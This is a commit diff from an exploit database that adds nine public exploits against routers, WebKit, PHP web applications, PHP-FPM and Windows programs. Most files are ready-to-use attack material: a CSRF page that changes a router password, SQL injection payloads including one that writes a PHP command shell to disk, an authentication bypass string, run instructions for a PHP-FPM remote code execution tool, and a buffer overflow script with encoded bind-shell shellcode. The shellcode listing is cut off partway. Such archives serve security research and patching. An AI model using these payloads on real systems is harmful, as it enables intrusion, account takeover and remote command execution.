DB: 2019-10-29

9 changes to exploits/shellcodes WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path ChaosPro 2.0 - Buffer Overflow (SEH) Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection Part-DB 0.4 - Authentication Bypass waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection PHP-FPM + Nginx - Remote Code Execution
2019-10-29 05:01:40 +00:00 · 2019-10-29 05:01:40 +00:00 · d4a236d578
commit d4a236d578
parent bc814a8404
10 changed files with 635 additions and 0 deletions
--- a/exploits/hardware/webapps/47545.txt
+++ b/exploits/hardware/webapps/47545.txt
@ -0,0 +1,26 @@
 Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
 Date: 2019-10-25
 Exploit Author: Prof. Joas Antonio
 Vendor Homepage: https://www.intelbras.com/pt-br/
 Software Link: http://en.intelbras.com.br/node/25896
 Version: 1.0.18
 Tested on: Windows
 CVE : N/A
 ####################
 # PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be
 <html>
  <body>
    <form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
 	<input type="hidden" name="GO" value="system_password.asp">
 	<input type="hidden" name="SYSPSC" value="0">
      	<input class="text" type="password" name="SYSOPS" value="hack123"/> 
 	<input class="text" type="password" name="SYSPS" value="mrrobot"/> 
 	<input class="text" type="password" name="SYSPS2" value="mrrobot"/> 
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
 </html>
--- a/exploits/multiple/dos/47552.txt
+++ b/exploits/multiple/dos/47552.txt
@ -0,0 +1,128 @@
 VULNERABILITY DETAILS
 HTMLFrameElementBase.cpp:
 ```
 bool HTMLFrameElementBase::isURLAllowed() const
 {
    if (m_URL.isEmpty()) // ***4***
        return true;
    return isURLAllowed(document().completeURL(m_URL));
 }
 bool HTMLFrameElementBase::isURLAllowed(const URL& completeURL) const
 {
    if (document().page() && document().page()->subframeCount() >= Page::maxNumberOfFrames) // ***3***
        return false;
    if (completeURL.isEmpty())
        return true;
    if (WTF::protocolIsJavaScript(completeURL)) {
        RefPtr<Document> contentDoc = this->contentDocument();
        if (contentDoc && !ScriptController::canAccessFromCurrentOrigin(contentDoc->frame(), document()))
            return false;
    }
    RefPtr<Frame> parentFrame = document().frame();
    if (parentFrame)
        return parentFrame->isURLAllowed(completeURL);
    return true;
 }
 void HTMLFrameElementBase::openURL(LockHistory lockHistory, LockBackForwardList lockBackForwardList)
 {
    if (!isURLAllowed())
        return;
 [...]
    parentFrame->loader().subframeLoader().requestFrame(*this, m_URL, frameName, lockHistory, lockBackForwardList);
 ```
 NodeRarData.h:
 ```
 class NodeRareData : public NodeRareDataBase {
 [...]
 private:
    unsigned m_connectedFrameCount : 10; // Must fit Page::maxNumberOfFrames. ***1***
 ```
 Page.h:
 ```
 class Page : public Supplementable<Page>, public CanMakeWeakPtr<Page> {
 [...]
    // Don't allow more than a certain number of frames in a page.
    // This seems like a reasonable upper bound, and otherwise mutually
    // recursive frameset pages can quickly bring the program to its knees
    // with exponential growth in the number of frames.
    static const int maxNumberOfFrames = 1000; // ***2***
 ```
 Every DOM node stores the number of child frames currently attached to the subtree to speed up the
 `disconnectSubframes` algorithm; more specifically, when the number of connected frames for a given
 node is zero, its subtree won't be traversed. The value is stored as a 10-bit integer[1], so, to
 protect it from overflowing, an upper bound for the total count of attached subframes has been
 introduced[2]. It's enforced inside `isURLAllowed`[3] along with some other URL-specific checks. The
 problem is if the current URL is empty, all the checks will be skipped[4].
 Therefore, an attacker can insert exactly 1024 frame elements with an empty URL into a node, so its
 connected subframe counter will overflow and become zero. Later, when the node is removed from the
 document tree, the subframes won't be detached.
 The attacker can also abuse the flaw to make a subframe "survive" a cross-origin page load because
 `disconnectDescendantFrames`, which is called during the document replacement, only processes   
 `iframe` elements inside the document tree. Then, if the subframe is navigated to the `about:srcdoc`
 URL, the new document will inherit the security context from its parent document, which can be an
 arbitrary cross-origin page, while the contents will be attacker-controlled.
 Moving the check closer to the actual frame creation in `SubframeLoader::loadSubframe` should fix
 the issue. Besides, since the `srcdoc` technique can be reused in other UXSS bugs, I think it's
 reasonable to try to break it. One way to achieve that is to replace the
 `disconnectDescendantFrames` call in `Document::prepareForDestruction` with a call to
 `FrameLoader::detachChildren`, which detaches subframes regardless of whether their associated
 elements are attached to the document tree. However, I'm not sure if this change would be safe. The
 attached patch just adds a release assertion after `disconnectDescendantFrames` to ensure that all
 subframes have been detached. The solution is not too elegant, but a similar fix in Blink
 (https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/dom/document.cc?rcl=a34380189132e826108a71d9f6024b863ce1dcaf&l=3115)
 has proved to be effective.
 VERSION
 WebKit revision 247430 
 Safari version 12.1.1 (14607.2.6.1.1)
 REPRODUCTION CASE
 The minimal test case that demonstrates the issue is as follows:
 ```
 <body>
 <script>
 const FRAME_COUNT = 1024;
 let container = document.body.appendChild(document.createElement('div'));
 for (let i = 0; i < FRAME_COUNT; ++i) {
  let frame = container.appendChild(document.createElement('iframe'));
  frame.style.display = 'none';
 }
 container.remove();
 frame = container.firstChild;
 alert(`
  <iframe> is not attached to the document tree, but still has a content frame!
  frame.parentNode.parentNode: ${frame.parentNode.parentNode}
  frame.contentWindow: ${frame.contentWindow}
 `);
 </script>
 </body>
 ```
 The full UXSS exploit is in the attached archive.
 CREDIT INFORMATION
 Sergei Glazunov of Google Project Zero
 Proof of Concept:
 https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47552.zip
--- a/exploits/php/webapps/47546.txt
+++ b/exploits/php/webapps/47546.txt
@ -0,0 +1,90 @@
 Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection
 Date: 2019-10-28
 Exploit Author: Cakes
 Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON
 Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git
 Version: 1.21
 Tested on: CentOS7
 CVE : N/A
 # PoC: Multiple SQL Injection vulnerabilities
 Parameter: start (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' RLIKE (SELECT (CASE WHEN (3201=3201) THEN 0x323031392d30312d32332030303a30303a3030 ELSE 0x28 END)) AND 'ScZt'='ScZt&end=2019-01-24 00:00:00
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6693 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6693=6693,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oFHi'='oFHi&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6752 FROM (SELECT(SLEEP(5)))ImfQ) AND 'EAnH'='EAnH&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
 Parameter: end (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' RLIKE (SELECT (CASE WHEN (4825=4825) THEN 0x323031392d30312d32342030303a30303a3030 ELSE 0x28 END)) AND 'xqhi'='xqhi
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 4638 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(4638=4638,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OvvR'='OvvR
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 6750 FROM (SELECT(SLEEP(5)))gPYF) AND 'Xhni'='Xhni
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
 Parameter: title (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=Test'||(SELECT 0x68506d50 FROM DUAL WHERE 9657=9657 AND 5501=5501)||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND [INFERENCE]
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=Test'||(SELECT 0x684f4b6d FROM DUAL WHERE 1515=1515 AND (SELECT 6271 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6271=6271,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Test'||(SELECT 0x72417477 FROM DUAL WHERE 3543=3543 AND (SELECT 4482 FROM (SELECT(SLEEP(5)))AnGw))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
 Parameter: description (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: title=Test&description=Test'||(SELECT 0x7570456a FROM DUAL WHERE 7753=7753 AND 5528=5528)||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND [INFERENCE]
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=Test&description=Test'||(SELECT 0x4f6d6f41 FROM DUAL WHERE 6915=6915 AND (SELECT 9677 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(9677=9677,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=Test&description=Test'||(SELECT 0x6a424e63 FROM DUAL WHERE 6961=6961 AND (SELECT 9467 FROM (SELECT(SLEEP(5)))jHfq))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
 Parameter: color (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: title=Test&description=Test&color=#0071c5' RLIKE (SELECT (CASE WHEN (2320=2320) THEN 0x23303037316335 ELSE 0x28 END)) AND 'XfIW'='XfIW&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 2035 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(2035=2035,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nWLO'='nWLO&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 7165 FROM (SELECT(SLEEP(5)))kngP) AND 'oklj'='oklj&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
    Vector: OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
--- a/exploits/php/webapps/47547.txt
+++ b/exploits/php/webapps/47547.txt
@ -0,0 +1,34 @@
 # Exploit Title: Part-DB 0.4 - Authentication Bypass
 # Date: 2019-10-26
 # Author: Marvoloo
 # Vendor Homepage: https://github.com/Part-DB/Part-DB/
 # Software Link: https://github.com/Part-DB/Part-DB/archive/master.zip
 # Version: 0.4
 # Tested on: Linux
 # CVE : N/A
 # Discription:
 # Easy authentication bypass vulnerability on the application 
 # allowing the attacker to login
 # url: http://localhost/login.php
 # Parameter & Payload: 
 '=''or'
 #vulnerable file: login.php Line: 29,30 
 #POC
 POST /login.php HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://localhost/login.php
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 24
 Cookie: ....
 Connection: close
 Upgrade-Insecure-Requests: 1
 DNT: 1
--- a/exploits/php/webapps/47548.txt
+++ b/exploits/php/webapps/47548.txt
@ -0,0 +1,28 @@
 Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting
 Date: 2019-10-28
 Exploit Author: Cakes
 Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON
 Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git
 Version: 1.21
 Tested on: CentOS7
 CVE : N/A
 # Description:
 # Cross-Site scripting vulnerability in the description field. This XSS completely breaks the web application.
 #POC
 POST /addEvent.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://10.0.0.20/calendar03/
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 213
 Cookie: PHPSESSID=t41kk4huqaluhcfghvqqvucl56
 Connection: close
 Upgrade-Insecure-Requests: 1
 DNT: 1
 title=%3Cscript%3Ealert%28%22TEST-Title%22%29%3B%3C%2Fscript%3E&description=%3Cscript%3Ealert%28%22TEST-Description%22%29%3B%3C%2Fscript%3E&color=%230071c5&start=2019-01-23+00%3A00%3A00&end=2019-01-24+00%3A00%3A00
--- a/exploits/php/webapps/47550.txt
+++ b/exploits/php/webapps/47550.txt
@ -0,0 +1,27 @@
 Exploit Title: delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection
 Date: 2019-10-28
 Exploit Author: Cakes
 Vendor Homepage: https://github.com/delpino73/Blue-Smiley-Organizer
 Software Link: https://github.com/delpino73/Blue-Smiley-Organizer.git
 Version: 1.32
 Tested on: CentOS7
 CVE : N/A
 # PoC: Multiple SQL Injection vulnerabilities
 # Nice and easy SQL Injection
 Parameter: datetime (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: datetime=2019-10-27 10:53:00' AND 6315=(SELECT (CASE WHEN (6315=6315) THEN 6315 ELSE (SELECT 3012 UNION SELECT 2464) END))-- sQtq&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
    Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: datetime=2019-10-27 10:53:00' AND (SELECT 7239 FROM (SELECT(SLEEP(5)))wrOx)-- cDKQ&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
 # Pop a PHP CMD Shell
 ' LIMIT 0,1 INTO OUTFILE '/Path/To/Folder/upload/exec.php' LINES TERMINATED BY 0x3c3f7068702024636d64203d207368656c6c5f6578656328245f4745545b27636d64275d293b206563686f2024636d643b203f3e-- -
--- a/exploits/php/webapps/47553.md
+++ b/exploits/php/webapps/47553.md
@ -0,0 +1,79 @@
 # PHuiP-FPizdaM
 ## What's this
 This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see [below](#the-full-list-of-preconditions)).
 ## What's vulnerable
 If a webserver runs nginx + php-fpm and nginx have a configuration like
 ```
 location ~ [^/]\.php(/|$) {
  ...
  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
  fastcgi_param PATH_INFO       $fastcgi_path_info;
  fastcgi_pass   php:9000;
  ...
 }
 ```
 which also lacks any script existence checks (like `try_files`), then you can probably hack it with this sploit.
 #### The full list of preconditions
 1. Nginx + php-fpm, `location ~ [^/]\.php(/|$)` must be forwarded to php-fpm (maybe the regexp can be stricter, see [#1](https://github.com/neex/phuip-fpizdam/issues/1)).
 2. The `fastcgi_split_path_info` directive must be there and contain a regexp starting with `^` and ending with `$`, so we can break it with a newline character.
 3. There must be a `PATH_INFO` variable assignment via statement `fastcgi_param PATH_INFO $fastcgi_path_info;`. At first, we thought it is always present in the `fastcgi_params` file, but it's not true.
 4. No file existence checks like `try_files $uri =404` or `if (-f $uri)`. If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch.
 5. This exploit works only for PHP 7+, but the bug itself is present in earlier versions (see [below](#about-php5)).
 ## Isn't this known to be vulnerable for years?
 A long time ago php-fpm didn't restrict the extensions of the scripts, meaning that something like `/avatar.png/some-fake-shit.php` could execute `avatar.png` as a PHP script. This issue was fixed around 2010.
 The current one doesn't require file upload, works in the most recent versions (until the fix has landed), and, most importantly, the exploit is much cooler.
 ## How to run
 Install it using
 ```
 go get github.com/neex/phuip-fpizdam
 ```
 If you get strange compilation errors, make sure you're using go >= 1.13. Run the program using `phuip-fpizdam [url]` (assuming you have the `$GOPATH/bin` inside your `$PATH`, otherwise specify the full path to the binary). Good output looks like this:
 ```
 2019/10/01 02:46:15 Base status code is 200
 2019/10/01 02:46:15 Status code 500 for qsl=1745, adding as a candidate
 2019/10/01 02:46:15 The target is probably vulnerable. Possible QSLs: [1735 1740 1745]
 2019/10/01 02:46:16 Attack params found: --qsl 1735 --pisos 126 --skip-detect
 2019/10/01 02:46:16 Trying to set "session.auto_start=0"...
 2019/10/01 02:46:16 Detect() returned attack params: --qsl 1735 --pisos 126 --skip-detect <-- REMEMBER THIS
 2019/10/01 02:46:16 Performing attack using php.ini settings...
 2019/10/01 02:46:40 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
 2019/10/01 02:46:40 Trying to cleanup /tmp/a...
 2019/10/01 02:46:40 Done!
 ```
 After this, you can start appending `?a=<your command>` to all PHP scripts (you may need multiple retries).
 ## Playground environment
 If you want to reproduce the issue or play with the exploit locally, do the following:
 1. Clone this repo and go to the `reproducer` directory.
 2. Create the docker image using `docker build -t reproduce-cve-2019-11043 .`. It takes a long time as it internally clones the php repository and builds it from the source. However, it will be easier this way if you want to debug the exploit. The revision built is the one right before the fix.
 2. Run the docker using `docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043`.
 3. Now you have http://127.0.0.1:8080/script.php, which is an empty file.
 4. Run the exploit using `phuip-fpizdam http://127.0.0.1:8080/script.php`
 5. If everything is ok, you'll be able to execute commands by appending `?a=` to the script: http://127.0.0.1:8080/script.php?a=id. Try multiple times as only some of php-fpm workers are infected.
 ## About PHP5
 The buffer underflow in php-fpm is present in PHP version 5. However, this exploit makes use of an optimization used for storing FastCGI variables, [_fcgi_data_seg](https://github.com/php/php-src/blob/5d6e923/main/fastcgi.c#L186). This optimization is present only in php 7, so this particular exploit works only for php 7. There might be another exploitation technique that works in php 5.
 ## Credits
 Original anomaly discovered by [d90pwn](https://twitter.com/d90pwn) during Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set php.ini options. Final php.ini options set is found by [beched](https://twitter.com/ahack_ru).
 EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47553.zip
--- a/exploits/windows/local/47549.txt
+++ b/exploits/windows/local/47549.txt
@ -0,0 +1,38 @@
 # Exploit Title: JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path
 # Google Dork: N/A
 # Date: 2019-09-09
 # Exploit Author: Roberto Escamilla
 # Vendor Homepage:https://www.inforprograma.net/
 # Software Link: https://www.inforprograma.net/
 # Version:  = 0.6.0.0 wpspin.exe
 # Tested on: Windows 10 Home
 # CVE : N/A
 ###############STEPS##########################
 # 1.- Install the JumpStart application on Windows 10 Home Operating System
 # 2.- Open our "System Symbol" application.
 # 3.- Execute the command -------wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
 # 4.- The following will appear in a list: JumpStart Push-Button Service      jswpbapi     C:\Program Files (x86)\Jumpstart\jswpbapi.exe
 # 5.- We proceed to verify the process using the command icacls, with which we verify the protection of the directory as shown below:
 NT AUTHORITY\SYSTEM:(I)(F)
 BUILTIN\Administradores:(I)(F)
 BUILTIN\Usuarios:(I)(RX)
 ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX)
 ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
 # 6.- Finally we verify using the command sc qc jswpbapi the protection of the service in which we observe that it is scalable in privileges 
 # since the route contains spaces without being in quotes and is in CONTROL_ERROR normal and NOMBRE_INICIO_SERVICIO: 
 # LocalSystem as it's shown in the following [SC] QueryServiceConfig CORRECTO
 NOMBRE_SERVICIO: jswpbapi
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Jumpstart\jswpbapi.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : JumpStart Push-Button Service
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/exploits/windows/local/47551.py
+++ b/exploits/windows/local/47551.py
@ -0,0 +1,176 @@
 # Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
 # Date: 2019-10-27
 # Exploit Author: Chase Hatch (SYANiDE)
 # Vendor Homepage: http://www.chaospro.de/
 # Software link: http://www.chaospro.de/cpro20.zip
 # Version: 2.0
 # Tested on: Windows XP Pro OEM
 #!/usr/bin/env python2
 import os, sys
 # sploit = "A"* 5000  ## Crash! 41414141 in SEH! via ProfilePath or PicturePath.  Windows XP OEM
 # `locate pattern_create.rb | head -n 1` 5000  #  326d4431
 # `locate pattern_offset.rb | head -n 1` 326d4431 5000  #  2705
 # sploit = "A" * (2705 -  4 - 126)  # 2575
 # sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
 # `locate pattern_offset.rb|head -n 1` 61413561 2575
 # 16
 ################ Second stage ####################
 sploit = "A"*16
 #  msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh 
 #, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
 sploit += (
 "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
 "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
 "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
 "\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
 "\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
 "\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
 "\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
 "\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
 "\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
 "\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
 "\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
 "\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
 "\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
 "\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
 "\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
 "\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
 "\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
 "\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
 "\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
 "\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
 "\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
 "\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
 "\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
 "\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
 "\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
 "\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
 "\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
 "\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
 "\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
 "\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
 "\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
 "\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
 "\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
 "\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
